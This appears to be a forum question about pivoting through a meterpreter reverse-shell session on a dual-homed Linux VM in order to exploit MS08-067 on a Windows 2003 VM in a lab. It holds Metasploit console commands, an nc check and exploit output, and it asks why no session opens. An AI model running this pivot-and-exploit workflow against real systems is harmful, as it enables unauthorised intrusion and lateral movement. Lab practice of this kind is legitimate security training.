
Pivoting with Metasploit

Çağlar Arlı

I am trying to exploit a Windows VM on a different subnet behind a dual-homed Linux VM where I already have a shell. To keep it simple, I have a meterpreter reverse_tcp shell on the Linux VM (192.168.47.144), and the Windows VM (192.168.128.133) is 2003 and vulnerable to MS08-067 (I tested this directly). Lastly, the Linux VM can definitely reach the SMB service on the Windows VM.

ubuntu:~$ ip -o addr show | grep -o '192.168.47.144' && nc -nvv 192.168.128.133 445
192.168.47.144
Connection to 192.168.128.133 445 port [tcp/*] succeeded!

The meterpreter reverse_tcp shell on the Linux VM connects back on port 5555, so there is no port-number conflict.

[*] Sending stage (826872 bytes) to 192.168.47.144
[*] Meterpreter session 2 opened (192.168.47.136:5555 -> 192.168.47.144:47395) at 2017-10-08 11:21:30 -0500

msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > route add 192.168.128.0 255.255.255.0 2
[*] Route added
msf exploit(ms08_067_netapi) > route

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.128.0      255.255.255.0      Session 2

[*] There are currently no IPv6 routes defined.
msf exploit(ms08_067_netapi) > set RHOST 192.168.128.133
RHOST => 192.168.128.133
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.47.136:4444 
[*] 192.168.128.133:445 - Automatically detecting the target...
[*] 192.168.128.133:445 - Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
[*] 192.168.128.133:445 - We could not detect the language pack, defaulting to English
[*] 192.168.128.133:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.128.133:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

Additionally, I gave this a run with LHOST 0.0.0.0 as well as LHOST 192.168.128.132 (the .128 subnet address of the Linux VM), but no shell there either. What am I missing?

I have also tried doing this manually through an SSH port forward, as seen in https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/, and ended up with the same result. The exploit hits the Windows VM, but no session is opened.

These are the main posts I have been referencing.

  1. http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
  2. https://pentest.blog/explore-hidden-networks-with-double-pivoting/
  3. http://www.whitelist1.com/2016/06/metasploit-double-pivoting.html